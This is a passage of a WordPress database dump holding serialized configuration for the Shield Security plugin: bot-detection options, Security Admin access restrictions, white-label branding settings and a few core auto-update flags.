Login\";s:11:\"description\";s:63:\"This message is displayed if the visitor fails a login attempt.\";}i:6;a:11:{s:3:\"key\";s:9:\"track_404\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:10:\"404 Detect\";s:7:\"summary\";s:33:\"Identify A Bot When It Hits A 404\";s:11:\"description\";s:53:\"Detect When A Visitor Browses To A Non-Existent Page.\";}i:7;a:11:{s:3:\"key\";s:16:\"track_linkcheese\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f6\";s:4:\"name\";s:11:\"Link Cheese\";s:7:\"summary\";s:38:\"Tempt A Bot With A Fake Link To Follow\";s:11:\"description\";s:45:\"Detect A Bot That Follows A \'no-follow\' Link.\";}i:8;a:11:{s:3:\"key\";s:12:\"track_xmlrpc\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:14:\"XML-RPC Access\";s:7:\"summary\";s:39:\"Identify A Bot When It Accesses XML-RPC\";s:11:\"description\";s:53:\"If you don\'t use XML-RPC, why would anyone access it?\";}i:9;a:10:{s:3:\"key\";s:17:\"track_loginfailed\";s:7:\"section\";s:14:\"section_logins\";s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:12:\"Failed Login\";s:7:\"summary\";s:47:\"Detect Failed Login Attempts By Valid Usernames\";s:11:\"description\";s:61:\"Penalise a visitor who fails to login using a valid username.\";}i:10;a:11:{s:3:\"key\";s:18:\"track_logininvalid\";s:7:\"section\";s:14:\"section_logins\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fn\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:17:\"Invalid Usernames\";s:7:\"summary\";s:30:\"Detect Invalid Username Logins\";s:11:\"description\";s:67:\"Identify A Bot When It Tries To Login With A Non-Existent Username.\";}i:11;a:11:{s:3:\"key\";s:20:\"track_fakewebcrawler\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f5\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:16:\"Fake Web Crawler\";s:7:\"summary\";s:34:\"Detect Fake Search Engine Crawlers\";s:11:\"description\";s:89:\"Identify a Bot when it presents as an official web crawler, but analysis shows it\'s fake.\";}i:12;a:11:{s:3:\"key\";s:15:\"track_useragent\";s:7:\"section\";s:18:\"section_behaviours\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fi\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:17:\"Empty User Agents\";s:7:\"summary\";s:38:\"Detect Requests With Empty User Agents\";s:11:\"description\";s:62:\"Identify a request as a bot if the user agent is not provided.\";}i:13;a:11:{s:3:\"key\";s:19:\"text_remainingtrans\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Remaining Offenses\";s:7:\"summary\";s:64:\"Visitor Triggers The IP Offenses System Through A Firewall Block\";s:11:\"description\";s:132:\"This message is displayed if the visitor triggered the IP Offenses system and reports how many offenses remain before being blocked.\";}i:14;a:5:{s:3:\"key\";s:15:\"autounblock_ips\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:3:\"ips\";s:62:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\IPs\\Handler\";}s:19:\"ip_lists_table_name\";s:8:\"ip_lists\";s:21:\"ip_list_table_columns\";a:11:{i:0;s:2:\"id\";i:1;s:2:\"ip\";i:2;s:5:\"label\";i:3;s:4:\"list\";i:4;s:3:\"ip6\";i:5;s:8:\"is_range\";i:6;s:14:\"transgressions\";i:7;s:14:\"last_access_at\";i:8;s:10:\"blocked_at\";i:9;s:10:\"created_at\";i:10;s:10:\"deleted_at\";}s:6:\"events\";a:12:{s:14:\"custom_offense\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}s:9:\"conn_kill\";a:1:{s:3:\"cat\";i:3;}s:10:\"ip_offense\";a:1:{s:3:\"cat\";i:2;}s:10:\"ip_blocked\";a:1:{s:3:\"cat\";i:2;}s:15:\"ip_unblock_flag\";a:1:{s:3:\"cat\";i:1;}s:12:\"bottrack_404\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:23:\"bottrack_fakewebcrawler\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:19:\"bottrack_linkcheese\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:20:\"bottrack_loginfailed\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:21:\"bottrack_logininvalid\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:18:\"bottrack_useragent\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}s:15:\"bottrack_xmlrpc\";a:2:{s:3:\"cat\";i:2;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334237,'shield_mod_config_4ed800687cb14bb83c1b8154d0077f82','a:6:{s:4:\"slug\";s:8:\"insights\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"insights\";s:4:\"name\";s:9:\"Dashboard\";s:10:\"menu_title\";s:18:\"Security Dashboard\";s:13:\"menu_priority\";s:1:\"5\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:8:\"insights\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;}s:12:\"requirements\";a:1:{s:3:\"php\";a:1:{s:7:\"version\";s:3:\"5.4\";}}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:0:{}s:10:\"meta_modts\";i:1582303038;}','yes'),(334238,'shield_mod_config_66824951eb3e135afb3ecb504219eef6','a:7:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:10:\"properties\";a:13:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:4:\"name\";s:14:\"Security Admin\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:7:\"tagline\";s:58:\"Protect your Security Plugin, not just your WordPress site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:20;}s:13:\"admin_notices\";a:2:{s:26:\"certain-options-restricted\";a:5:{s:2:\"id\";s:26:\"certain-options-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:8:\"per_user\";b:1;s:4:\"type\";s:7:\"warning\";}s:22:\"admin-users-restricted\";a:5:{s:2:\"id\";s:22:\"admin-users-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:4:\"type\";s:7:\"warning\";s:8:\"per_user\";b:1;}}s:8:\"sections\";a:5:{i:0;a:6:{s:4:\"slug\";s:41:\"section_admin_access_restriction_settings\";s:7:\"primary\";b:1;s:5:\"title\";s:35:\"Security Admin Restriction Settings\";s:11:\"title_short\";s:23:\"Security Admin Settings\";s:7:\"summary\";a:2:{i:0;s:52:\"Purpose - Restrict access using a simple Access Key.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"338551188\";}i:1;a:5:{s:4:\"slug\";s:38:\"section_admin_access_restriction_areas\";s:5:\"title\";s:32:\"Security Admin Restriction Zones\";s:11:\"title_short\";s:24:\"Access Restriction Zones\";s:7:\"summary\";a:2:{i:0;s:120:\"Purpose - Restricts access to key WordPress areas for all users not authenticated with the Security Admin Access system.\";i:1;s:57:\"Recommendation - Use of this feature is highly recommend.\";}s:13:\"help_video_id\";s:9:\"339824074\";}i:2;a:4:{s:4:\"slug\";s:18:\"section_whitelabel\";s:5:\"title\";s:18:\"Shield White Label\";s:11:\"title_short\";s:11:\"White Label\";s:7:\"summary\";a:1:{i:0;s:92:\"Purpose - Rename and re-brand the Shield Security plugin for your client site installations.\";}}i:3;a:4:{s:4:\"slug\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:5:\"title\";s:39:\"Enable Module: WordPress Security Admin\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:3:{i:0;s:100:\"Purpose - Restricts access to this plugin preventing unauthorized changes to your security settings.\";i:1;s:59:\"Recommendation - Keep the Security Admin feature turned on.\";i:2;s:63:\"You need to also enter a new Access Key to enable this feature.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:20:{i:0;a:9:{s:3:\"key\";s:31:\"enable_admin_access_restriction\";s:7:\"section\";s:54:\"section_enable_plugin_feature_admin_access_restriction\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/40\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf02\";s:4:\"name\";s:21:\"Enable Security Admin\";s:7:\"summary\";s:41:\"Enforce Security Admin Access Restriction\";s:11:\"description\";s:157:\"Enable this with great care and consideration. When this Access Key option is enabled, you must specify a key below and use it to gain access to this plugin.\";}i:1;a:10:{s:3:\"key\";s:16:\"admin_access_key\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:9:\"link_info\";s:19:\"https://shsec.io/42\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:25:\"Security Admin Access Key\";s:7:\"summary\";s:40:\"Provide/Update Security Admin Access Key\";s:11:\"description\";s:92:\"Careful: If you forget this, you could potentially lock yourself out from using this plugin.\";}i:2;a:11:{s:3:\"key\";s:15:\"sec_admin_users\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/dk\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Security Admins\";s:7:\"summary\";s:26:\"Persistent Security Admins\";s:11:\"description\";s:79:\"All emails, usernames, or user IDs entered here will always be Security Admins.\";}i:3;a:10:{s:3:\"key\";s:20:\"admin_access_timeout\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:7:\"default\";i:30;s:4:\"type\";s:7:\"integer\";s:3:\"min\";i:1;s:9:\"link_info\";s:19:\"https://shsec.io/41\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Security Admin Timeout\";s:7:\"summary\";s:63:\"Specify An Automatic Timeout Interval For Security Admin Access\";s:11:\"description\";s:133:\"This will automatically expire your Security Admin Session. Does not apply until you enter the access key again. Default: 60 minutes.\";}i:4;a:9:{s:3:\"key\";s:20:\"allow_email_override\";s:7:\"section\";s:41:\"section_admin_access_restriction_settings\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/gf\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Allow Email Override\";s:7:\"summary\";s:49:\"Allow Email Override Of Admin Access Restrictions\";s:11:\"description\";s:96:\"Allow the use of verification emails to override and switch off the Security Admin restrictions.\";}i:5;a:9:{s:3:\"key\";s:29:\"admin_access_restrict_options\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf32\";s:4:\"name\";s:5:\"Pages\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:140:\"Careful: This will restrict access to page/post creation, editing and deletion. Note: Selecting \'Edit\' will also restrict all other options.\";}i:6;a:9:{s:3:\"key\";s:33:\"admin_access_restrict_admin_users\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Admin Users\";s:7:\"summary\";s:57:\"Restrict Access To Create/Delete/Modify Other Admin Users\";s:11:\"description\";s:127:\"Careful: This will restrict the ability of WordPress administrators from creating, modifying or promoting other administrators.\";}i:7;a:9:{s:3:\"key\";s:29:\"admin_access_restrict_plugins\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:16:\"activate_plugins\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:15:\"install_plugins\";s:4:\"text\";s:7:\"Install\";}i:2;a:2:{s:9:\"value_key\";s:14:\"update_plugins\";s:4:\"text\";s:6:\"Update\";}i:3;a:2:{s:9:\"value_key\";s:14:\"delete_plugins\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:47:\"Restrict Access To Key WordPress Plugin Actions\";s:11:\"description\";s:156:\"Careful: This will restrict access to plugin installation, update, activation and deletion. Note: Selecting \'Activate\' will also restrict all other options.\";}i:8;a:9:{s:3:\"key\";s:28:\"admin_access_restrict_themes\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:13:\"switch_themes\";s:4:\"text\";s:8:\"Activate\";}i:1;a:2:{s:9:\"value_key\";s:18:\"edit_theme_options\";s:4:\"text\";s:18:\"Edit Theme Options\";}i:2;a:2:{s:9:\"value_key\";s:14:\"install_themes\";s:4:\"text\";s:7:\"Install\";}i:3;a:2:{s:9:\"value_key\";s:13:\"update_themes\";s:4:\"text\";s:6:\"Update\";}i:4;a:2:{s:9:\"value_key\";s:13:\"delete_themes\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:42:\"Restrict Access To WordPress Theme Actions\";s:11:\"description\";s:90:\"Careful: This will restrict access to theme installation, update, activation and deletion.\";}i:9;a:9:{s:3:\"key\";s:27:\"admin_access_restrict_posts\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"edit\";s:4:\"text\";s:11:\"Create/Edit\";}i:1;a:2:{s:9:\"value_key\";s:7:\"publish\";s:4:\"text\";s:7:\"Publish\";}i:2;a:2:{s:9:\"value_key\";s:6:\"delete\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:79:\"Careful: This will restrict access to page/post creation, editing and deletion.\";}i:10;a:10:{s:3:\"key\";s:17:\"whitelabel_enable\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dr\";s:9:\"link_blog\";s:19:\"https://shsec.io/ds\";s:4:\"name\";s:18:\"Enable White Label\";s:7:\"summary\";s:34:\"Activate Your White Label Settings\";s:11:\"description\";s:61:\"Use this option to turn on/off the whole White Label feature.\";}i:11;a:9:{s:3:\"key\";s:15:\"wl_hide_updates\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Hide Updates\";s:7:\"summary\";s:47:\"Hide Available Updates From Non Security Admins\";s:11:\"description\";s:66:\"Hides the availability of Shield updates from non-security admins.\";}i:12;a:10:{s:3:\"key\";s:17:\"wl_pluginnamemain\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:6:\"Shield\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Plugin Name\";s:7:\"summary\";s:22:\"The Name Of The Plugin\";s:11:\"description\";s:23:\"The Name Of The Plugin.\";}i:13;a:10:{s:3:\"key\";s:11:\"wl_namemenu\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:15:\"Shield Security\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Menu Title\";s:7:\"summary\";s:33:\"The Main Menu Title Of The Plugin\";s:11:\"description\";s:79:\"The Main Menu Title Of The Plugin. If left empty, the Plugin Name will be used.\";}i:14;a:10:{s:3:\"key\";s:14:\"wl_companyname\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"Example Company Name\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Company Name\";s:7:\"summary\";s:24:\"The Name Of Your Company\";s:11:\"description\";s:33:\"Provide the name of your company.\";}i:15;a:10:{s:3:\"key\";s:14:\"wl_description\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:74:\"Secure Your Sites With The World\'s Most Powerful WordPress Security Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Plugin Tag Line\";s:7:\"summary\";s:26:\"The Tag Line Of The Plugin\";s:11:\"description\";s:27:\"The Tag Line Of The Plugin.\";}i:16;a:10:{s:3:\"key\";s:10:\"wl_homeurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:19:\"https://shsec.io/7f\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"Home URL\";s:7:\"summary\";s:20:\"Plugin Home Page URL\";s:11:\"description\";s:84:\"When a user clicks the home link for this plugin, this is where they\'ll be directed.\";}i:17;a:10:{s:3:\"key\";s:14:\"wl_menuiconurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"pluginlogo_16x16.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Menu Icon\";s:7:\"summary\";s:13:\"Menu Icon URL\";s:11:\"description\";s:42:\"The URL of the icon displayed in the menu.\";}i:18;a:10:{s:3:\"key\";s:19:\"wl_dashboardlogourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:22:\"pluginlogo_128x128.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}i:19;a:10:{s:3:\"key\";s:19:\"wl_login2fa_logourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:29:\"pluginlogo_banner-772x250.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}}s:11:\"definitions\";a:3:{s:22:\"restricted_pages_users\";a:2:{i:0;s:13:\"user-edit.php\";i:1;s:9:\"users.php\";}s:6:\"events\";a:2:{s:11:\"key_success\";a:1:{s:6:\"recent\";b:1;}s:8:\"key_fail\";a:3:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}s:19:\"options_to_restrict\";a:4:{s:12:\"wpms_options\";a:3:{i:0;s:11:\"admin_email\";i:1;s:9:\"site_name\";i:2;s:12:\"registration\";}s:10:\"wpms_pages\";a:1:{i:0;s:12:\"settings.php\";}s:10:\"wp_options\";a:10:{i:0;s:8:\"blogname\";i:1;s:15:\"blogdescription\";i:2;s:7:\"siteurl\";i:3;s:4:\"home\";i:4;s:11:\"admin_email\";i:5;s:15:\"new_admin_email\";i:6;s:18:\"users_can_register\";i:7;s:15:\"comments_notify\";i:8;s:18:\"comment_moderation\";i:9;s:11:\"blog_public\";}s:8:\"wp_pages\";a:4:{i:0;s:19:\"options-general.php\";i:1;s:22:\"options-discussion.php\";i:2;s:19:\"options-reading.php\";i:3;s:11:\"options.php\";}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(442029,'endurance_cloudflare_enabled','0','yes'),(463237,'auto_update_core_dev','enabled','yes'),(463238,'auto_update_core_minor','enabled','yes'),(463239,'auto_update_core_major','unset','yes'),(445536,'shield_mod_config_e83942c5345a48e3fa64d19f6d59def1','a:7:{s:4:\"slug\";s:5:\"comms\";s:10:\"properties\";a:15:{s:4:\"slug\";s:5:\"comms\";s:11:\"storage_key\";s:5:\"comms\";s:4:\"name\";s:5:\"Comms\";s:10:\"menu_title\";s:5:\"Comms\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:2:{i:0;a:4:{s:4:\"slug\";s:16:\"section_suresend\";s:7:\"primary\";b:1;s:5:\"title\";s:14:\"SureSend Email\";s:11:\"title_short\";s:14:\"SureSend Email\";}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:11:{s:3:\"key\";s:15:\"suresend_emails\";s:7:\"section\";s:16:\"section_suresend\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:13:\"value_options\";a:1:{i:0;a:2:{s:9:\"value_key\";s:3:\"2fa\";s:4:\"text\";s:29:\"2FA Login Codes (admins only)\";}}s:9:\"link_info\";s:18:\"https://icwp.io/ij\";s:9:\"link_blog\";s:18:\"https://icwp.io/ik\";s:4:\"name\";s:15:\"SureSend Emails\";s:7:\"summary\";s:15:\"SureSend Emails\";s:11:\"description\";s:16:\"SureSend Emails.\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:2:{s:16:\"suresend_success\";a:0:{}s:13:\"suresend_fail\";a:0:{}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(439282,'gf_stla_reviews_installed_on','2020-09-27 